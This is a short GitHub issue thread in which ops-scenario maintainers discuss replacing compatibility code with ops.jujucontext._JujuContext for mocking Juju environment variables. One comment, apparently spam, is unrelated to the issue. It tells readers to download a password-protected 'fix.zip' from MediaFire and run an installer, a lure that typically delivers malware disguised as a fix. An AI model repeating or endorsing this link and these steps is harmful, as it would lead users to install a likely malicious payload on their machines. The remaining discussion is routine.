### ISSUE TITLE
Use ops.jujucontext._JujuContext

### ISSUE THREAD

**Issue by tonyandrewmeyer** [canonical/ops-scenario#179]
We should be able to simplify some of the code by using the new `ops.jujucontext._JujuContext` class to manage mocking the environment variables that normally come from Juju.

There's some compatibility code added in #178 that can be cleaned out and replaced by requiring the newer version of ops and making proper use of a `_JujuContext` object.

Maybe we want to do this and #125 together, or do that one first and then this one?

Relevant ops PR: https://github.com/canonical/operator/pull/1313

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tonyandrewmeyer** [comment]
Moved to https://github.com/canonical/operator/issues/1420
